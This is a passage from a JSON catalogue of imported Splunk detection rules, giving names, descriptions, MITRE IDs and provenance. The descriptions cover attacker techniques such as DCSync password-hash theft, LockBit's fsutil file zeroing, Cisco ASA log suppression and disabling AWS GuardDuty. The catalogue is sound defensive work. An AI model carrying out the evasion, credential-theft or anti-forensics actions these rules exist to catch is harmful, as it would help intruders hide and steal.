"categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-new-mfa-method-registered-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4e3c26f2-4fb9-4bd7-ab46-1b76ffa2a23b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_new_mfa_method_registered_for_user.yml" } }, { "id": "splunk-security-content-4e3e3b8c-6d3a-4b47-9f5a-9e3e0a0a6f2f", "type": "detection", "name": "Windows Cabinet File Extraction Via Expand", "description": "Detects usage of expand.exe to extract Microsoft Cabinet (CAB) archives, with\nemphasis on extractions into `C:\\\\ProgramData` or similar staging locations. In\nrecent APT37 activity, a CAB payload (e.g., wonder.cab) was expanded into\nProgramData prior to persistence and execution. This behavior is a strong signal\nfor ingress tool transfer and staging of payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cabinet-file-extraction-via-expand.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4e3e3b8c-6d3a-4b47-9f5a-9e3e0a0a6f2f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cabinet_file_extraction_via_expand.yml" } }, { "id": "splunk-security-content-4e41ad21-9761-426d-8aa1-083712ff9f30", "type": "detection", "name": "MacOS AMOS Stealer - Virtual Machine Check Activity", "description": "The following analytic detects AMOS Stealer VM check activity on macOS. It leverages osquery to monitor process events and identifies the execution of the \"osascript\" command along with specific commandline strings.\nThis activity is significant as AMOS stealer was seen using this pattern in order to check if the host is a Virtual Machine or not.\nIf confirmed malicious, this behavior indicate that the host is already infected by the AMOS stealer, which could allow attackers to execute arbitrary code, escalate privileges, steal information, or persist within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1059.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-amos-stealer-virtual-machine-check-activity.yaml", "provenance": { "source": "splunk/security_content", "source_id": "4e41ad21-9761-426d-8aa1-083712ff9f30", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_amos_stealer___virtual_machine_check_activity.yml" } }, { "id": "splunk-security-content-4e5e024e-fabb-11eb-8b8f-acde48001122", "type": "detection", "name": "Fsutil Zeroing File", "description": "The following analytic detects the execution of the 'fsutil' command with the 'setzerodata' parameter, which zeros out a target file. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because it is a technique used by ransomware, such as LockBit, to evade detection by erasing its malware path after encrypting the host. If confirmed malicious, this action could hinder forensic investigations and allow attackers to cover their tracks, complicating incident response efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/fsutil-zeroing-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4e5e024e-fabb-11eb-8b8f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/fsutil_zeroing_file.yml" } }, { "id": "splunk-security-content-4e6c9d2a-8f3b-4c7e-9a5f-2d8b6e1c4a9f", "type": "detection", "name": "Cisco ASA - Logging Message Suppression", "description": "This analytic detects suppression of specific logging messages on Cisco ASA devices using the \"no logging message\" command.\nAdversaries may suppress specific log message IDs to selectively disable logging of security-critical events such as authentication failures, configuration changes, or suspicious network activity. This targeted approach allows attackers to evade detection while maintaining normal logging operations that might otherwise alert administrators to complete logging disablement.\nThe detection monitors for command execution events (message ID 111008 or 111010) containing the \"no logging message\" command, which is used to suppress specific message IDs from being logged regardless of the configured severity level.\nInvestigate unauthorized message suppression, especially suppression of security-critical message IDs (authentication, authorization, configuration changes), suppression performed by non-administrative accounts, during unusual hours, or without documented justification.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002", "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-logging-message-suppression.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4e6c9d2a-8f3b-4c7e-9a5f-2d8b6e1c4a9f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___logging_message_suppression.yml" } }, { "id": "splunk-security-content-4e7c2f85-8f02-4bd2-a48b-5ec98a2c5f72", "type": "detection", "name": "Windows SQLCMD Execution", "description": "This detection identifies potentially suspicious usage of sqlcmd.exe, focusing on command patterns that may indicate data exfiltration, reconnaissance, or malicious database operations. The detection looks for both short-form (-X) and long-form (--flag) suspicious parameter combinations, which have been observed in APT campaigns targeting high-value organizations. For example, threat actors like CL-STA-0048 have been known to abuse sqlcmd.exe for data theft and exfiltration from compromised MSSQL servers. The detection monitors for suspicious authentication attempts, output redirection, and potentially malicious query patterns that could indicate unauthorized database access or data theft.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sqlcmd-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4e7c2f85-8f02-4bd2-a48b-5ec98a2c5f72", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sqlcmd_execution.yml" } }, { "id": "splunk-security-content-4f3b0c97-657e-4547-a89a-9a50c656e3cd", "type": "detection", "name": "Kubernetes Anomalous Inbound Outbound Network IO", "description": "The following analytic identifies high inbound or outbound network I/O anomalies in Kubernetes containers. It leverages process metrics from an OTEL collector and Kubelet Stats Receiver, along with data from Splunk Observability Cloud. A lookup table with average and standard deviation values for network I/O is used to detect anomalies persisting over a 1-hour period. This activity is significant as it may indicate data exfiltration, command and control communication, or unauthorized data transfers. If confirmed malicious, it could lead to data breaches, service outages, financial losses, and reputational damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-anomalous-inbound-outbound-network-io.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4f3b0c97-657e-4547-a89a-9a50c656e3cd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_anomalous_inbound_outbound_network_io.yml" } }, { "id": "splunk-security-content-4f546cf4-15aa-4368-80f7-940e92bc551e", "type": "detection", "name": "Windows Chromium Browser with Custom User Data Directory", "description": "The following analytic detects instances where the Chromium-based browser (e.g., Google Chrome, Microsoft Edge) is launched with the --user-data-dir command-line argument. While this flag is legitimate and used for multi-profile support or automation, it is frequently leveraged by malware and adversaries to run Chrome in an isolated environment for stealth operations, credential harvesting, phishing delivery, or evasion of user session artifacts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chromium-browser-with-custom-user-data-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4f546cf4-15aa-4368-80f7-940e92bc551e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chromium_browser_with_custom_user_data_directory.yml" } }, { "id": "splunk-security-content-4f568a0e-896f-4d94-a2f7-fa6d82ab1f77", "type": "detection", "name": "GitHub Organizations Repository Archived", "description": "The following analytic detects when a repository is archived in GitHub Organizations. The detection monitors GitHub Organizations audit logs for repository archival events by tracking actor details, repository information, and associated metadata. For a SOC, identifying repository archival is important as it could indicate attempts to make critical code inaccessible or preparation for repository deletion. While archiving is a legitimate feature, unauthorized archival of active repositories could signal account compromise, insider threats, or attempts to disrupt development operations. The impact of unauthorized repository archival includes loss of active development access, disruption to workflows and CI/CD pipelines, and potential business delays if critical repositories are affected. Additionally, archived repositories may be targeted for subsequent deletion, potentially resulting in permanent loss of intellectual property if proper backups are not maintained.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-organizations-repository-archived.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4f568a0e-896f-4d94-a2f7-fa6d82ab1f77", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_organizations_repository_archived.yml" } }, { "id": "splunk-security-content-4f7e3913-4db3-4ccd-afe4-31198982305d", "type": "detection", "name": "Windows BootLoader Inventory", "description": "The following analytic identifies the bootloader paths on Windows endpoints. It leverages a PowerShell Scripted input to capture this data, which is then processed and aggregated using Splunk. Monitoring bootloader paths is significant for a SOC as it helps detect unauthorized modifications that could indicate bootkits or other persistent threats. If confirmed malicious, such activity could allow attackers to maintain persistence, bypass security controls, and potentially control the boot process, leading to full system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1542.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-bootloader-inventory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4f7e3913-4db3-4ccd-afe4-31198982305d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_bootloader_inventory.yml" } }, { "id": "splunk-security-content-4f9564dd-a204-4f22-b375-4dfca3a68731", "type": "detection", "name": "Windows Increase in Group or Object Modification Activity", "description": "This analytic detects an increase in modifications to AD groups or objects. Frequent changes to AD groups or objects can indicate potential security risks, such as unauthorized access attempts, impairing defences or establishing persistence. By monitoring AD logs for unusual modification patterns, this detection helps identify suspicious behavior that could compromise the integrity and security of the AD environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098", "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-increase-in-group-or-object-modification-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4f9564dd-a204-4f22-b375-4dfca3a68731", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_increase_in_group_or_object_modification_activity.yml" } }, { "id": "splunk-security-content-4fa7f846-054a-11ec-a836-acde48001122", "type": "detection", "name": "Get-DomainTrust with PowerShell", "description": "The following analytic identifies the execution of the Get-DomainTrust command from PowerView using PowerShell, which is used to gather domain trust information. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. This activity is significant as it indicates potential reconnaissance efforts by an adversary to understand domain trust relationships, which can inform lateral movement strategies. If confirmed malicious, this could allow attackers to map out the network, identify potential targets, and plan further attacks, potentially compromising additional systems within the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-domaintrust-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4fa7f846-054a-11ec-a836-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_domaintrust_with_powershell.yml" } }, { "id": "splunk-security-content-4fbf9270-43da-11ec-9486-acde48001122", "type": "detection", "name": "Windows InstallUtil Remote Network Connection", "description": "The following analytic detects the Windows InstallUtil.exe binary making a remote network connection. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and network telemetry. This activity is significant because InstallUtil.exe can be exploited to download and execute malicious code, bypassing application control mechanisms. If confirmed malicious, an attacker could achieve code execution, potentially leading to further system compromise, data exfiltration, or lateral movement within the network. Analysts should review the parent process, network connections, and any associated file modifications to determine the legitimacy of this activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-installutil-remote-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4fbf9270-43da-11ec-9486-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_installutil_remote_network_connection.yml" } }, { "id": "splunk-security-content-4fc4c031-e5be-4cc0-8cf9-49f9f507bcb5", "type": "detection", "name": "Linux PHP Privilege Escalation", "description": "The following analytic detects the execution of PHP commands with elevated privileges on a Linux system. It identifies instances where PHP is used in conjunction with 'sudo' and 'system' commands, indicating an attempt to run system commands as the root user. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line arguments. This activity is significant because it can indicate an attempt to escalate privileges, potentially leading to full root access. If confirmed malicious, this could allow an attacker to execute arbitrary commands with root privileges, compromising the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-php-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4fc4c031-e5be-4cc0-8cf9-49f9f507bcb5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_php_privilege_escalation.yml" } }, { "id": "splunk-security-content-4fee57b8-d825-4bf3-9ea8-bf405cdb614c", "type": "detection", "name": "Windows System Shutdown CommandLine", "description": "The following analytic identifies the execution of the Windows shutdown command via the command line interface. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because attackers may use the shutdown command to erase tracks, cause disruption, or ensure changes take effect after installing backdoors. If confirmed malicious, this activity could lead to system downtime, denial of service, or evasion of security tools, impacting the overall security posture of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-shutdown-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4fee57b8-d825-4bf3-9ea8-bf405cdb614c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_shutdown_commandline.yml" } }, { "id": "splunk-security-content-4ff9767b-fdf2-489c-83a5-c6c34412d72e", "type": "detection", "name": "Windows Modify Registry DontShowUI", "description": "The following analytic detects modifications to the Windows Error Reporting registry key \"DontShowUI\" to suppress error reporting dialogs. It leverages data from the Endpoint datamodel's Registry node to identify changes where the registry value is set to 0x00000001. This activity is significant as it is commonly associated with DarkGate malware, which uses this modification to avoid detection during its installation. If confirmed malicious, this behavior could allow attackers to maintain a low profile, avoiding user alerts and potentially enabling further malicious activities without user intervention.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-dontshowui.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4ff9767b-fdf2-489c-83a5-c6c34412d72e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_dontshowui.yml" } }, { "id": "splunk-security-content-5029b681-0462-47b7-82e7-f7e3d37f5a2d", "type": "detection", "name": "ASL AWS Defense Evasion Impair Security Services", "description": "The following analytic detects the deletion of critical AWS Security Services configurations, such as CloudWatch alarms, GuardDuty detectors, and Web Application Firewall rules. It leverages Amazon Security Lake logs to identify specific API calls like \"DeleteLogStream\" and \"DeleteDetector.\" This activity is significant because adversaries often use these actions to disable security monitoring and evade detection. If confirmed malicious, this could allow attackers to operate undetected, leading to potential data breaches, unauthorized access, and prolonged persistence within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-defense-evasion-impair-security-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5029b681-0462-47b7-82e7-f7e3d37f5a2d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_defense_evasion_impair_security_services.yml" } }, { "id": "splunk-security-content-503d17cb-9eab-4cf8-a20e-01d5c6987ae3", "type": "detection", "name": "Batch File Write to System32", "description": "The following analytic detects the creation of a batch file (.bat) within the Windows system directory tree, specifically in the System32 or SysWOW64 folders. It leverages data from the Endpoint datamodel, focusing on process and filesystem events to identify this behavior. This activity is significant because writing batch files to system directories can be indicative of malicious intent, such as persistence mechanisms or system manipulation. If confirmed malicious, this could allow an attacker to execute arbitrary commands with elevated privileges, potentially compromising the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/batch-file-write-to-system32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "503d17cb-9eab-4cf8-a20e-01d5c6987ae3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/batch_file_write_to_system32.yml" } }, { "id": "splunk-security-content-508b2649-3a1e-4a4c-ba9d-3cc05e1a1b70", "type": "detection", "name": "Windows SharePoint ToolPane Endpoint Exploitation Attempt", "description": "The following analytic detects potential exploitation attempts against Microsoft SharePoint Server vulnerability CVE-2025-53770, also known as \"ToolShell\". This detection monitors for POST requests to the ToolPane.aspx endpoint with specific DisplayMode parameter, which is a key indicator of the exploit. This vulnerability allows unauthenticated remote code execution on affected SharePoint servers, enabling attackers to fully access SharePoint content, file systems, internal configurations, and execute code over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sharepoint-toolpane-endpoint-exploitation-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "508b2649-3a1e-4a4c-ba9d-3cc05e1a1b70", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/windows_sharepoint_toolpane_endpoint_exploitation_attempt.yml" } }, { "id": "splunk-security-content-50998483-bb15-457b-a870-965080d9e3d3", "type": "detection", "name": "Windows AD Replication Request Initiated from Unsanctioned Location", "description": "The following analytic identifies unauthorized Active Directory replication requests initiated from non-domain controller locations. It leverages EventCode 4662 to detect when a computer account with replication permissions creates a handle to domainDNS, filtering out known domain controller IP addresses. This activity is significant as it may indicate a DCSync attack, where an attacker with privileged access can request password hashes for any or all users within the domain. If confirmed malicious, this could lead to unauthorized access to sensitive information and potential full domain compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-replication-request-initiated-from-unsanctioned-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "50998483-bb15-457b-a870-965080d9e3d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_replication_request_initiated_from_unsanctioned_location.yml" } }, { "id": "splunk-security-content-50eaabf8-5180-4e86-bfb2-011472c359fc", "type": "detection", "name": "O365 Tenant Wide Admin Consent Granted", "description": "The following analytic identifies instances where admin consent is granted to an application within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to the admin consent action within the AzureActiveDirectory workload. This activity is significant because admin consent allows applications to access data across the entire tenant, potentially exposing vast amounts of organizational data. If confirmed malicious, an attacker could gain extensive and persistent access to organizational data, leading to data exfiltration, espionage, further malicious activities, and potential compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-tenant-wide-admin-consent-granted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "50eaabf8-5180-4e86-bfb2-011472c359fc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_tenant_wide_admin_consent_granted.yml" } }, { "id": "splunk-security-content-510ea428-4731-4d2f-8829-a28293e427aa", "type": "detection", "name": "Windows Linked Policies In ADSI Discovery", "description": "The following analytic detects the use of the `[Adsisearcher]` type accelerator in PowerShell Script Block Logging (EventCode=4104) to query Active Directory for domain organizational units. This detection leverages PowerShell operational logs to identify script blocks containing `[adsisearcher]`, `objectcategory=organizationalunit`, and `findAll()`. This activity is significant as it indicates potential reconnaissance efforts by adversaries to gain situational awareness of the domain structure. If confirmed malicious, this could lead to further exploitation, such as privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-linked-policies-in-adsi-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "510ea428-4731-4d2f-8829-a28293e427aa", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_linked_policies_in_adsi_discovery.yml" } }, { "id": "splunk-security-content-51307514-1236-49f6-8686-d46d93cc2821", "type": "detection", "name": "Windows AD Replication Request Initiated by User Account", "description": "The following analytic detects a user account initiating an Active Directory replication request, indicative of a DCSync attack. It leverages EventCode 4662 from the Windows Security Event Log, focusing on specific object types and replication permissions. This activity is significant because it can allow an attacker with sufficient privileges to request password hashes for any or all users within the domain. If confirmed malicious, this could lead to unauthorized access, privilege escalation, and potential compromise of the entire domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-replication-request-initiated-by-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "51307514-1236-49f6-8686-d46d93cc2821", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_replication_request_initiated_by_user_account.yml" } }, { "id": "splunk-security-content-515cccd0-c4d8-4427-92d9-8a8f8b5a71dc", "type": "detection", "name": "ESXi Download Errors", "description": "This detection identifies failed file download attempts on ESXi hosts by looking for specific error messages in the system logs. These failures may indicate unauthorized or malicious attempts to install or update components\u2014such as VIBs or scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1601.001", "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-download-errors.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "515cccd0-c4d8-4427-92d9-8a8f8b5a71dc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_download_errors.yml" } }, { "id": "splunk-security-content-51c04fdb-2746-465a-b86e-b413a09c9085", "type": "detection", "name": "AWS Concurrent Sessions From Different Ips", "description": "The following analytic identifies an AWS IAM account with concurrent sessions originating from more than one unique IP address within a 5-minute window. It leverages AWS CloudTrail logs, specifically the `DescribeEventAggregates` event, to detect this behavior. This activity is significant as it may indicate a session hijacking attack, where an adversary uses stolen session cookies to access AWS resources from a different location. If confirmed malicious, this could allow unauthorized access to sensitive corporate resources, leading to potential data breaches or further exploitation within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-concurrent-sessions-from-different-ips.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the 